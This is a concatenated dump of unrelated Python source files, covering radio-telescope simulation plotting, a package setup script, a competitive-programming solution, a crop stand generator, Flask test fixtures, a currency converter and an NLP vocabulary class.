plt.plot(u.value, v.value, '.', color='b', markersize=0.2)\n plt.plot(-u.value, -v.value, '.', color='b', markersize=0.2)\n plt.xlabel('U (wavelengths)')\n plt.ylabel('V (wavelengths)')\n plt.title(title)\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\n\ndef plot_azel(bvis_list, plot_file=None, **kwargs):\n \"\"\" Standard plot of az el coverage\n \n :param bvis_list:\n :param plot_file:\n :param kwargs:\n :return:\n \"\"\"\n plt.clf()\n r2d = 180.0 / numpy.pi\n \n for ibvis, bvis in enumerate(bvis_list):\n ha = calculate_blockvisibility_hourangles(bvis).value\n az, el = calculate_blockvisibility_azel(bvis)\n if ibvis == 0:\n plt.plot(ha, az.deg, '.', color='r', label='Azimuth (deg)')\n plt.plot(ha, el.deg, '.', color='b', label='Elevation (deg)')\n else:\n plt.plot(ha, az.deg, '.', color='r')\n plt.plot(ha, el.deg, '.', color='b')\n plt.xlabel('HA (hours)')\n plt.ylabel('Angle')\n plt.legend()\n plt.title('Azimuth and elevation vs hour angle')\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\n\ndef plot_pa(bvis_list, plot_file=None, **kwargs):\n \"\"\" Standard plot of parallactic angle coverage\n\n :param bvis_list:\n :param plot_file:\n :param kwargs:\n :return:\n \"\"\"\n plt.clf()\n\n for ibvis, bvis in enumerate(bvis_list):\n ha = calculate_blockvisibility_hourangles(bvis).value\n pa = calculate_blockvisibility_parallactic_angles(bvis)\n if ibvis == 0:\n plt.plot(ha, pa.deg, '.', color='r', label='PA (deg)')\n else:\n plt.plot(ha, pa.deg, '.', color='r')\n plt.xlabel('HA (hours)')\n plt.ylabel('Parallactic Angle')\n plt.legend()\n plt.title('Parallactic angle vs hour angle')\n if plot_file is not None:\n 
plt.savefig(plot_file)\n plt.show(block=False)\n\n\ndef plot_gaintable(gt_list, title='', value='amp', plot_file='gaintable.png', **kwargs):\n \"\"\" Standard plot of gain table\n \n :param gt_list:\n :param title:\n :param plot_file:\n :param kwargs:\n :return:\n \"\"\"\n plt.clf()\n for igt, gt in enumerate(gt_list):\n nrec = gt[0].nrec\n names = gt[0].receptor_frame.names\n if nrec > 1:\n recs = [0, 1]\n else:\n recs = [1]\n \n colors = ['r', 'b']\n for irec, rec in enumerate(recs):\n amp = numpy.abs(gt[0].gain[:, 0, 0, rec, rec])\n if value == 'phase':\n y = numpy.angle(gt[0].gain[:, 0, 0, rec, rec])\n if igt == 0:\n plt.plot(gt[0].time[amp > 0.0], y[amp > 0.0], '.', color=colors[rec], label=names[rec])\n else:\n plt.plot(gt[0].time[amp > 0.0], y[amp > 0.0], '.', color=colors[rec])\n else:\n y = amp\n if igt == 0:\n plt.plot(gt[0].time[amp > 0.0], 1.0 / y[amp > 0.0], '.', color=colors[rec], label=names[rec])\n else:\n plt.plot(gt[0].time[amp > 0.0], 1.0 / y[amp > 0.0], '.', color=colors[rec])\n plt.title(title)\n plt.xlabel('Time (s)')\n plt.legend()\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\n\ndef plot_pointingtable(pt_list, plot_file, title, **kwargs):\n \"\"\" Standard plot of pointing table\n \n :param pt_list:\n :param plot_file:\n :param title:\n :param kwargs:\n :return:\n \"\"\"\n plt.clf()\n r2a = 180.0 * 3600.0 / numpy.pi\n rms_az = 0.0\n rms_el = 0.0\n num = 0\n for pt in pt_list:\n num += len(pt.pointing[:, 0, 0, 0, 0])\n rms_az += numpy.sum((r2a * pt.pointing[:, 0, 0, 0, 0]) ** 2)\n rms_el += numpy.sum((r2a * pt.pointing[:, 0, 0, 0, 1]) ** 2)\n plt.plot(pt.time, r2a * pt.pointing[:, 0, 0, 0, 0], '.', color='r')\n plt.plot(pt.time, r2a * pt.pointing[:, 0, 0, 0, 1], '.', color='b')\n \n rms_az = numpy.sqrt(rms_az / num)\n rms_el = numpy.sqrt(rms_el / num)\n plt.title(\"%s az, el rms %.2f %.2f (arcsec)\" % (title, rms_az, rms_el))\n plt.xlabel('Time (s)')\n plt.ylabel('Offset (arcsec)')\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\n\ndef find_pb_width_null(pbtype, frequency, **kwargs):\n \"\"\" Rough estimates of HWHM and null locations\n \n :param pbtype:\n :param frequency:\n :param kwargs:\n :return:\n \"\"\"\n if pbtype == 'MID':\n HWHM_deg = 0.596 * 1.36e9 / frequency[0]\n null_az_deg = 2.0 * HWHM_deg\n null_el_deg = 2.0 * HWHM_deg\n elif pbtype == 'MID_FEKO_B1':\n null_az_deg = 1.0779 * 1.36e9 / frequency[0]\n null_el_deg = 1.149 * 1.36e9 / frequency[0]\n HWHM_deg = 0.447 * 1.36e9 / frequency[0]\n elif pbtype == 'MID_FEKO_B2':\n null_az_deg = 1.0779 * 1.36e9 / frequency[0]\n null_el_deg = 1.149 * 1.36e9 / frequency[0]\n HWHM_deg = 0.447 * 1.36e9 / frequency[0]\n elif pbtype == 'MID_FEKO_Ku':\n null_az_deg = 1.0779 * 1.36e9 / frequency[0]\n null_el_deg = 1.149 * 1.36e9 / frequency[0]\n HWHM_deg = 0.447 * 1.36e9 / frequency[0]\n else:\n null_az_deg = 1.145 * 1.36e9 / frequency[0]\n null_el_deg = 1.145 * 1.36e9 / frequency[0]\n HWHM_deg = 0.447 * 1.36e9 / frequency[0]\n \n return HWHM_deg, null_az_deg, null_el_deg\n\n\ndef create_simulation_components(context, phasecentre, frequency, pbtype, offset_dir, flux_limit,\n pbradius, pb_npixel, pb_cellsize, show=False, fov=10,\n polarisation_frame=PolarisationFrame(\"stokesI\"),\n filter_by_primary_beam=True, flux_max=10.0):\n \"\"\" Construct components for simulation\n \n :param context: singlesource or null or s3sky\n :param phasecentre: Centre of components\n :param frequency: Frequency\n :param pbtype: Type of primary beam\n :param offset_dir: Offset in 
ra, dec degrees\n :param flux_limit: Lower limit flux\n :param pbradius: Radius of components in radians\n :param pb_npixel: Number of pixels in the primary beam model\n :param pb_cellsize: Cellsize in primary beam model\n :param fov: FOV in degrees (used to select catalog)\n :param flux_max: Maximum flux in model before application of primary beam\n :param filter_by_primary_beam: Filter components by primary beam\n :param polarisation_frame:\n :param show:\n\n :return:\n \"\"\"\n \n HWHM_deg, null_az_deg, null_el_deg = find_pb_width_null(pbtype, frequency)\n \n dec = phasecentre.dec.deg\n ra = phasecentre.ra.deg\n \n if context == 'singlesource':\n log.info(\"create_simulation_components: Constructing single component\")\n offset = [HWHM_deg * offset_dir[0], HWHM_deg * offset_dir[1]]\n log.info(\n \"create_simulation_components: Offset from pointing centre = %.3f, %.3f deg\" % (\n offset[0], offset[1]))\n \n # The point source is offset to approximately the halfpower point\n odirection = SkyCoord(\n ra=(ra + offset[0] / numpy.cos(numpy.pi * dec / 180.0)) * units.deg,\n dec=(dec + offset[1]) * units.deg,\n frame='icrs', equinox='J2000')\n \n if polarisation_frame.type == \"stokesIQUV\":\n original_components = [\n Skycomponent(flux=[[1.0, 0.0, 0.0, 0.0]], direction=odirection, frequency=frequency,\n polarisation_frame=PolarisationFrame('stokesIQUV'))]\n else:\n original_components = [\n Skycomponent(flux=[[1.0]], direction=odirection, frequency=frequency,\n polarisation_frame=PolarisationFrame('stokesI'))]\n \n offset_direction = odirection\n \n elif context == 'doublesource':\n \n original_components = []\n \n log.info(\"create_simulation_components: Constructing double components\")\n \n for sign_offset in [(-1, 0), (1, 0)]:\n offset = [HWHM_deg * sign_offset[0], HWHM_deg * sign_offset[1]]\n \n log.info(\n \"create_simulation_components: Offset from pointing centre = %.3f, %.3f deg\" % (\n offset[0], offset[1]))\n \n odirection = SkyCoord(\n ra=(ra + offset[0] / numpy.cos(numpy.pi * dec / 180.0)) * units.deg,\n dec=(dec + offset[1]) * units.deg,\n frame='icrs', equinox='J2000')\n if polarisation_frame.type == \"stokesIQUV\":\n original_components.append(\n Skycomponent(flux=[[1.0, 0.0, 0.0, 0.0]], direction=odirection, frequency=frequency,\n polarisation_frame=PolarisationFrame('stokesIQUV')))\n else:\n original_components.append(\n Skycomponent(flux=[[1.0]], direction=odirection, frequency=frequency,\n polarisation_frame=PolarisationFrame('stokesI')))\n \n for o in original_components:\n print(o)\n \n offset_direction = odirection\n \n elif context == 'null':\n log.info(\"create_simulation_components: Constructing single component at the null\")\n \n offset = [null_az_deg * offset_dir[0], null_el_deg * offset_dir[1]]\n HWHM = HWHM_deg * numpy.pi / 180.0\n \n log.info(\"create_simulation_components: Offset from pointing centre = %.3f, %.3f deg\" % (offset[0], offset[1]))\n \n # The point source is offset to approximately the null point\n offset_direction = SkyCoord(ra=(ra + offset[0] / numpy.cos(numpy.pi * dec / 180.0)) * units.deg,\n dec=(dec + offset[1]) * units.deg,\n frame='icrs', equinox='J2000')\n \n if polarisation_frame.type == \"stokesIQUV\":\n original_components = [\n Skycomponent(flux=[[1.0, 0.0, 0.0, 0.0]], direction=offset_direction, frequency=frequency,\n polarisation_frame=PolarisationFrame('stokesIQUV'))]\n else:\n original_components = [\n Skycomponent(flux=[[1.0]], direction=offset_direction, frequency=frequency,\n polarisation_frame=PolarisationFrame('stokesI'))]\n \n 
else:\n offset = [0.0, 0.0]\n # Make a skymodel from S3\n max_flux = 0.0\n total_flux = 0.0\n log.info(\"create_simulation_components: Constructing s3sky components\")\n from rascil.processing_components.simulation import create_test_skycomponents_from_s3\n \n all_components = create_test_skycomponents_from_s3(flux_limit=flux_limit / 100.0,\n phasecentre=phasecentre,\n polarisation_frame=polarisation_frame,\n frequency=numpy.array(frequency),\n radius=pbradius,\n fov=fov)\n original_components = filter_skycomponents_by_flux(all_components, flux_max=flux_max)\n log.info(\"create_simulation_components: %d components before application of primary beam\" %\n (len(original_components)))\n \n\n \n if filter_by_primary_beam:\n pbmodel = create_image(npixel=pb_npixel,\n cellsize=pb_cellsize,\n phasecentre=phasecentre,\n frequency=frequency,\n polarisation_frame=PolarisationFrame(\"stokesI\"))\n stokesi_components = [copy_skycomponent(o) for o in original_components]\n for s in stokesi_components:\n s.flux = numpy.array([[s.flux[0, 0]]])\n s.polarisation_frame = PolarisationFrame(\"stokesI\")\n \n pb = create_pb(pbmodel, \"MID_GAUSS\", pointingcentre=phasecentre, use_local=False)\n pb_applied_components = [copy_skycomponent(c) for c in stokesi_components]\n pb_applied_components = apply_beam_to_skycomponent(pb_applied_components, pb)\n filtered_components = []\n for icomp, comp in enumerate(pb_applied_components):\n if comp.flux[0, 0] > flux_limit:\n total_flux += comp.flux[0, 0]\n if abs(comp.flux[0, 0]) > max_flux:\n max_flux = abs(comp.flux[0, 0])\n filtered_components.append(original_components[icomp])\n log.info(\"create_simulation_components: %d components > %.3f Jy after filtering with primary beam\" %\n (len(filtered_components), flux_limit))\n log.info(\"create_simulation_components: Strongest components is %g (Jy)\" % max_flux)\n log.info(\"create_simulation_components: Total flux in components is %g (Jy)\" % total_flux)\n original_components = [copy_skycomponent(c) for c in filtered_components]\n if show:\n plt.clf()\n show_image(pb, components=original_components)\n plt.show(block=False)\n \n log.info(\"create_simulation_components: Created %d components\" % len(original_components))\n # Primary beam points to the phasecentre\n offset_direction = SkyCoord(ra=ra * units.deg, dec=dec * units.deg, frame='icrs',\n equinox='J2000')\n \n return original_components, offset_direction\n","sub_path":"rascil/processing_components/simulation/simulation_helpers.py","file_name":"simulation_helpers.py","file_ext":"py","file_size_in_byte":18987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"328187947","text":"# coding=utf-8\nfrom setuptools import setup, find_packages\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name='request_log_info',\n version='1.0.0',\n description='',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author='zhangruyu',\n author_email='1582034460@qq.com',\n license=\"BSD\",\n url='https://github.com/zhangruyu/request_log_info',\n packages=find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: OS Independent\",\n ],\n)\n\n# python setup.py sdist buil\n# python setup.py sdist 
buil\n","sub_path":"pypi_install_script/request_log_info-1.0.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"29646810","text":"'''\n#!/usr/bin/python\n\ndef ia(): return map(int, raw_input().split())\n\nn, k = ia()\np = ia()\nc = ia()\n\nh = []\nP = zip(p, c, xrange(n))\nP.sort()\n\nlst = [None] * n\nh = []\nfor p, c, i in P:\n ans = c + sum(h)\n lst[i] = ans\n h.append(c)\n h.sort(reverse=True)\n h = h[:k]\n\nprint \" \".join(map(str, lst))\n\n4 2\n4 5 9 7\n1 2 11 33\n'''\nnk, k = [int(x) for x in input().split()]\nknights = [int(x) for x in input().split()]\ncoins = [int(x) for x in input().split()]\n\ndata = sorted(zip(knights, coins, range(nk)))\nhave = [0] * nk\nselected = []\nfor p, c, i in data:\n ans = c + sum(selected)\n have[i] = ans\n selected.append(c)\n selected = sorted(selected, reverse=True)[:k]\nprint(*have)\n\n\n\n\n\n\n","sub_path":"CodeForces/488_B_knightsOfPolygonTable.py","file_name":"488_B_knightsOfPolygonTable.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"309512585","text":"\"\"\"\r\nClass interface for stand generation\r\n\"\"\"\r\n\r\nfrom math import sqrt\r\nfrom random import sample\r\nfrom scipy.interpolate import interp1d\r\n\r\nfrom alinea.adel.stand.stand import agronomicplot, regular_plot\r\n\r\nclass AgronomicStand(object):\r\n \r\n def __init__(self, sowing_density=10, plant_density=10, inter_row=0.8, noise=0, density_curve_data=None):\r\n self.sowing_density = sowing_density\r\n self.inter_row = inter_row\r\n self.plant_density = plant_density\r\n self.inter_plant = 1. / inter_row / sowing_density\r\n self.noise = noise\r\n df = density_curve_data\r\n if df is None:\r\n self.density_curve=None\r\n else:\r\n #hs_curve = interp1d(df['HS'], df['density'])\r\n TT_curve = interp1d(df['TT'], df['density'])\r\n #self.density_curve = {'hs_curve':hs_curve,'TT_curve':TT_curve}\r\n self.density_curve = TT_curve\r\n \r\n \r\n \r\n def plot_dimensions(self, nplants =1, aspect = 'square'):\r\n \r\n if aspect =='square':\r\n side = sqrt(1. / self.sowing_density * nplants)\r\n nrow = max(1, round(side / self.inter_row))\r\n plant_per_row = max(1, round(side / self.inter_plant)) \r\n plot_length = self.inter_plant * plant_per_row\r\n plot_width = self.inter_row * nrow\r\n return plot_length, plot_width\r\n elif aspect == 'line':\r\n plot_width = self.inter_row \r\n plot_length = nplants * self.inter_plant * self.sowing_density / float(self.plant_density) if self.plant_density > 0. else 0.\r\n return plot_length, plot_width \r\n else:\r\n return 0.5, 0.5\r\n \r\n def smart_stand(self, nplants=1, at=None):\r\n \"\"\" return an (almost) square stand that match inter-row, current density and nplants in the stand, \r\n but (dynamicaly) adjusting inter-plant to solve the problem\r\n \"\"\"\r\n \r\n density = self.plant_density\r\n if at is not None:\r\n if self.density_curve is not None:\r\n density = self.density_curve(at)\r\n \r\n # find a square design for sowing\r\n nsown = nplants * 1. * self.sowing_density / density\r\n side = sqrt(1. 
/ self.sowing_density * nsown)\r\n nrow = int(max(1, round(side / self.inter_row)))\r\n plant_per_row = int(max(1, round(float(nsown) / nrow)))\r\n while nplants > (nrow * plant_per_row):\r\n plant_per_row += 1\r\n domain_area = nrow * self.inter_row * plant_per_row * self.inter_plant\r\n # adjust inter_plant spacing so that n_emerged / domain_area match plant density \r\n n_emerged = int(round(domain_area * density))\r\n #assert(n_emerged >= nplants)\r\n n_emerged = nplants\r\n target_domain_area = 1. * n_emerged / density\r\n inter_plant = target_domain_area / (plant_per_row * nrow * self.inter_row) \r\n \r\n positions, domain, domain_area = regular_plot(inter_plant, self.inter_row, nrow, plant_per_row, noise=self.noise)\r\n\r\n positions = sample(positions, nplants)\r\n return nplants, domain, positions, domain_area\r\n \r\n \r\n def stand(self, nplants = 1, aspect='square'):\r\n \r\n length, width = self.plot_dimensions(nplants, aspect)\r\n n_emerged, positions, domain, domain_area, convUnit = agronomicplot(length, width, self.sowing_density, self.plant_density, self.inter_row, noise=self.noise)\r\n \r\n return n_emerged, domain, positions, length * width\r\n \r\n def plot(self, positions):\r\n import pandas\r\n \r\n df = pandas.DataFrame(positions)\r\n df.plot(0,1,style='o')\r\n \r\n \r\ndef agronomicStand_node(sowing_density=10, plant_density=10, inter_row=0.8, noise=0, density_curve_data=None):\r\n return AgronomicStand(**locals())","sub_path":"adel/Stand.py","file_name":"Stand.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"48756783","text":"import os\nimport subprocess\nimport datetime\n\nfrom bs4 import BeautifulSoup\n\nimport pytest\nfrom alembic.command import upgrade\nfrom alembic.config import Config\nfrom flask_migrate import Migrate, MigrateCommand\nfrom flask_script import Manager\nimport sqlalchemy\nfrom flask_jwt_extended import create_access_token, create_refresh_token\n\nfrom app import create_app, db as _db, get_env\nfrom app.models import EVENT\nfrom tests.db import (\n create_article,\n create_email,\n create_event,\n create_event_date,\n create_event_type,\n create_fee,\n create_marketing,\n create_member,\n create_reject_reason,\n create_speaker,\n create_user,\n create_venue\n)\n\nTEST_DATABASE_URI = \"postgresql://localhost/na_api_\" + get_env() + '_test'\nTEST_ADMIN_USER = 'admin@example.com'\nTEST_ADMIN_USER_CONFIG = 'admin-config@example.com'\n\n\n@pytest.yield_fixture(scope='session')\ndef app():\n _app = create_app(**{\n 'TESTING': True,\n 'ENVIRONMENT': 'test',\n 'SQLALCHEMY_DATABASE_URI': TEST_DATABASE_URI,\n 'PREFERRED_URL_SCHEME': 'http',\n 'ADMIN_CLIENT_ID': 'testadmin',\n 'ADMIN_CLIENT_SECRET': 'testsecret',\n 'TOKEN_EXPIRY': 1,\n 'JWT_SECRET_KEY': 'secret',\n 'ADMIN_USERS': [TEST_ADMIN_USER_CONFIG],\n 'EMAIL_DOMAIN': 'example.com',\n 'EMAIL_TOKENS': {\"member_id\": \"memberid\", \"type\": \"typeid\"},\n 'EMAIL_SALT': 'test',\n 'EMAIL_UNSUB_SALT': 'unsub_test',\n 'TEST_EMAIL': 'test@example.com',\n 'EVENTS_MAX': 2,\n 'PROJECT': 'test-project',\n 'STORAGE': 'test-store',\n 'PAYPAL_URL': 'https://test.paypal',\n 'PAYPAL_USER': 'seller@test.com',\n 'PAYPAL_PASSWORD': 'test pass',\n 'PAYPAL_SIG': 'paypal signature',\n 'PAYPAL_RECEIVER': 'receiver@example.com',\n 'PAYPAL_VERIFY_URL': 'https://test.paypal/verify',\n 'API_BASE_URL': 'http://test',\n 'FRONTEND_URL': 'http://frontend-test',\n 'FRONTEND_ADMIN_URL': 'http://frontend-test/admin',\n 
'CELERY_BROKER_URL': 'http://mock-celery',\n 'EMAIL_DELAY': 60\n })\n\n ctx = _app.app_context()\n ctx.push()\n\n yield _app\n\n ctx.pop()\n\n\n@pytest.fixture(scope='session')\ndef db(app):\n assert _db.engine.url.database.endswith('_test'), 'dont run tests against main db'\n\n create_test_db_if_does_not_exist(_db)\n\n Migrate(app, _db)\n Manager(_db, MigrateCommand)\n BASE_DIR = os.path.dirname(os.path.dirname(__file__))\n ALEMBIC_CONFIG = os.path.join(BASE_DIR, 'migrations')\n config = Config(ALEMBIC_CONFIG + '/alembic.ini')\n config.set_main_option(\"script_location\", ALEMBIC_CONFIG)\n\n with app.app_context():\n upgrade(config, 'head')\n\n yield _db\n\n _db.session.remove()\n _db.get_engine(app).dispose()\n\n\n@pytest.fixture(scope='function')\ndef db_session(db):\n yield db\n\n db.session.remove()\n for tbl in reversed(db.metadata.sorted_tables):\n if tbl.name not in [\"event_states\", \"email_types\", \"email_states\", \"ticket_types\", \"ticket_statuses\"]:\n db.engine.execute(tbl.delete())\n db.session.commit()\n\n\n@pytest.fixture(scope='function')\ndef sample_article(db):\n return create_article(title='Ancient Greece')\n\n\n@pytest.fixture(scope='function')\ndef sample_email(db):\n return create_email(\n details='Fees: 10, Concessions: 5',\n created_at='2019-06-01',\n expires='2019-07-01'\n )\n\n\n@pytest.fixture(scope='function')\ndef sample_marketing(db):\n return create_marketing(\n old_id=1,\n description='Leaflet'\n )\n\n\n@pytest.fixture(scope='function')\ndef sample_member(db):\n return create_member(\n name='Sue Green',\n email='sue@example.com'\n )\n\n\n@pytest.fixture(scope='function')\ndef sample_event(db):\n return create_event(title='test_title', description='test description')\n\n\n@pytest.fixture(scope='function')\ndef sample_event_with_dates(db, sample_event_date_without_event):\n another_event_date = create_event_date(event_datetime='2018-01-02 19:00')\n return create_event(\n title='test_title',\n description='test description',\n event_dates=[sample_event_date_without_event, another_event_date]\n )\n\n\n@pytest.fixture(scope='function')\ndef sample_event_type(db):\n return create_event_type(event_type='short course')\n\n\n@pytest.fixture(scope='function')\ndef sample_event_date(db, sample_event):\n return create_event_date(event_id=sample_event.id)\n\n\n@pytest.fixture(scope='function')\ndef sample_event_date_without_event(db):\n return create_event_date()\n\n\n@pytest.fixture(scope='function')\ndef sample_fee(db, sample_event_type):\n return create_fee(fee=5, conc_fee=3, event_type_id=sample_event_type.id)\n\n\n@pytest.fixture(scope='function')\ndef sample_reject_reason(db, sample_event):\n return create_reject_reason(sample_event.id)\n\n\n@pytest.fixture(scope='function')\ndef sample_speaker(db):\n return create_speaker(name='Paul White')\n\n\n@pytest.fixture(scope='function')\ndef sample_user(db):\n return create_user(email='test_user@example.com', name='Test User')\n\n\n@pytest.fixture(scope='function')\ndef sample_admin_user(db):\n return create_user(email=TEST_ADMIN_USER, name='Admin User', access_area='admin')\n\n\n@pytest.fixture(scope='function')\ndef sample_venue(db):\n return create_venue()\n\n\n# token set around 2017-12-10T23:10:00\n@pytest.fixture(scope='function')\ndef sample_decoded_token():\n start, expiry = get_unixtime_start_and_expiry()\n\n return {\n 'jti': 'test',\n 'exp': expiry,\n 'iat': start,\n 'fresh': False,\n 'type': 'access',\n 'nbf': start,\n 'identity': 'admin'\n }\n\n\n@pytest.fixture\ndef sample_uuid():\n return 
'42111e2a-c990-4d38-a785-394277bbc30c'\n\n\ndef create_test_db_if_does_not_exist(db):\n try:\n conn = db.engine.connect()\n conn.close()\n\n except sqlalchemy.exc.OperationalError as e:\n if 'database \"{}\" does not exist'.format(TEST_DATABASE_URI.split('/')[-1:][0]) in e.message:\n db_url = sqlalchemy.engine.url.make_url(TEST_DATABASE_URI)\n dbname = db_url.database\n\n if db_url.drivername == 'postgresql':\n subprocess.call(['/usr/bin/env', 'createdb', dbname])\n else:\n raise\n\n\ndef request(url, method, data=None, headers=None):\n r = method(url, data=data, headers=headers)\n r.soup = BeautifulSoup(r.get_data(as_text=True), 'html.parser')\n return r\n\n\ndef create_authorization_header(client_id='testadmin'):\n expires = datetime.timedelta(minutes=1)\n\n token = create_access_token(identity=client_id, expires_delta=expires)\n return 'Authorization', 'Bearer {}'.format(token)\n\n\ndef create_refresh_header(client_id='testadmin'):\n token = create_refresh_token(identity=client_id)\n return 'Authorization', 'Bearer {}'.format(token)\n\n\ndef get_unixtime_start_and_expiry(year=2017, month=12, day=10, hour=23, minute=10):\n from time import mktime\n d = datetime.datetime(year, month, day, hour, minute, 0)\n unixtime = mktime(d.timetuple())\n\n added_time = 900\n unixtime_expiry = unixtime + added_time\n return unixtime, unixtime_expiry\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":7159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"606341398","text":"import requests, json, sys\nfrom tools.printer import print_msg, print_tool_name, get_input, clear_console\n\n# api_key=31120a6edf-52f0320c4e-qqu4cg\n\n\nall_codes = dict()\n\ndef get_amount():\n while True:\n try:\n return float(get_input(\"Enter Amount: \"))\n \n except KeyboardInterrupt:\n print_msg(\"warning\", \"\\nProgram Terminated!\\n\")\n exit()\n\n except Exception as e:\n print_msg(\"error\", e)\n continue\n\ndef get_all_codes(display=False):\n try:\n r_data = requests\\\n .get(\"https://api.fastforex.io/currencies?api_key=31120a6edf-52f0320c4e-qqu4cg\")\n\n return json.loads(r_data.content)['currencies']\n\n except requests.exceptions.ConnectionError:\n print_msg(\"error\", \"\\nUnable to Connect to Host! 
Please check your internet connection\\n\")\n exit()\n\ndef get_curr(payloads):\n try:\n response = requests\\\n .get(\"https://api.fastforex.io/fetch-one\", params=payloads)\n\n r_data = json.loads(response.content)\n\n if \"error\" in r_data:\n raise Exception(r_data['error'])\n\n return r_data\n\n except requests.exceptions.ConnectionError as e:\n print_msg(\"error\", e)\n return False\n\n except Exception as e:\n print_msg(\"error\", e)\n\ndef get_code(text):\n all_codes = get_all_codes()\n while True:\n try:\n code = get_input(text).upper()\n if code in all_codes:\n return code\n else:\n raise Exception(\"The Currency code --> {} does not exist\"\\\n .format(code))\n\n except KeyboardInterrupt:\n print_msg(\"warning\", \"\\nProgram Terminated!\\n\")\n exit()\n\n except Exception as e:\n print_msg(\"error\", e)\n continue\n\n\ndef convert():\n curr_from = get_code(\"Convert From: \")\n curr_to = get_code(\"Convert To: \")\n amount = get_amount()\n\n payloads = {\n \"from\":curr_from, \n \"to\": curr_to, \n \"api_key\":\"31120a6edf-52f0320c4e-qqu4cg\"\n }\n\n data = get_curr(payloads)\n if data != None:\n total = data['result'][curr_to] * amount\n print_msg(\"success\", \"\\n{}-{} ==> {}-{:.2f} \".format(\n curr_from, amount, curr_to, total\n ))\n\ndef converter():\n print_tool_name(\"Aboki $$\", \"Devvyhac\", \"Team Trace Techie\", \"github.com/devvyhac\")\n convert()\n\n","sub_path":"currency_converter/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"402528971","text":"# Vocabulary\nfrom __future__ import division, print_function\n\nimport util.io as io\nimport sys\nfrom collections import defaultdict, Counter\nimport string\nimport nltk\nimport numpy as np\n\nclass Vocab:\n\n def __init__(self, fn = None):\n\n self.D = defaultdict()\n self.idx2word = defaultdict()\n\n # Punctuations.\n self.punc = set(list(string.punctuation))\n # Special tokens.\n self.special_tokens = ['', '', '']\n\n if fn:\n self.load(fn)\n\n\n def save(self, fn):\n io.save_json(self.D, fn)\n\n def load(self, fn):\n d = io.load_json(fn)\n assert(isinstance(d, dict) and '' in d)\n\n self.D = defaultdict(lambda: d[''], d)\n idx2word = [(idx, w) for w, idx in self.D.iteritems()]\n self.idx2word = defaultdict(lambda: '', idx2word)\n\n def __getitem__(self, x):\n if isinstance(x, int):\n return self.idx2word[x]\n else:\n return self.D[unicode(x)]\n\n def __len__(self):\n return len(self.D)\n\n def build_from_corpus(self, corpus, max_size = 100000, min_num = 5):\n '''\n corpus: The textual corpus to build vocabulary from. 
The format is [string].\n\n max_size: max size of the vocabulary\n min_num: min appearance number of a word that will be included in the vocabulary\n '''\n\n print('[vocab.py] building from corpus')\n\n # filter_words is a list of words that are not wanted to be in the vocabulary\n filter_words = self.punc\n\n # build the vocabulary\n print('>>> tokenizing...')\n # corpus_token = [nltk.word_tokenize(unicode(sent).lower()) for sent in corpus]\n # words = sum(corpus_token, [])\n words = []\n n_sent = len(corpus)\n for i, sent in enumerate(corpus):\n words += nltk.word_tokenize(unicode(sent).lower())\n if i % 100 == 0:\n print('\\r %.2f%%' % (100*i/n_sent), end = '')\n sys.stdout.flush()\n print('')\n\n\n print('>>> counting...')\n word_counter = Counter(words).most_common()\n words_t = [w for (w, c) in word_counter if c >= min_num and w not in filter_words]\n words_t = words_t[0:max_size]\n words_t = self.special_tokens + words_t\n\n print('>>> building dictionary')\n self.D = defaultdict(lambda: words_t.index(''), zip(words_t, range(len(words_t))))\n self.idx2word = defaultdict(lambda: '', zip(range(len(words_t)), words_t))\n\n def encode(self, sent, seq_length = None, decorate = True):\n '''\n Encode sentence(str) into index_seq([int])\n '''\n\n seq = [self.D[w] for w in nltk.word_tokenize(unicode(sent).lower()) if w not in self.punc]\n\n if decorate:\n seq = [self.D['']] + seq + [self.D['']]\n\n if seq_length:\n if len(seq) > seq_length:\n seq = seq[0:seq_length]\n else:\n seq += [self.D['']] * (seq_length - len(seq))\n\n return seq\n\n def decode(self, seq):\n '''\n Decode sentence(str) from seq([word_index])\n '''\n tokens = []\n for idx in seq:\n w = self.idx2word[idx]\n if w == '':\n continue\n elif w == '':\n break\n else:\n tokens.append(w)\n return ' '.join(tokens)\n\n\n def encode_batch(self, sents, seq_length):\n '''\n Encode a batch of sentences. 
The sequences will be truncated to the same size\n '''\n\n seqs = [self.encode(sent, seq_length + 1, decorate = True) for sent in sents]\n\n seqs_input = [seq[0:seq_length] for seq in seqs]\n seqs_target = [seq[1::] for seq in seqs]\n \n # mask where is 0 and other token is 1\n v = np.where(np.array(seqs_target) == self.D[''], 0, 1) \n seq_mask = np.where(v[:,::-1].cumsum(1)[:,::-1] > 0, 1, 0).tolist()\n\n return seqs_input, seqs_target, seq_mask\n","sub_path":"modules/vocab.py","file_name":"vocab.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
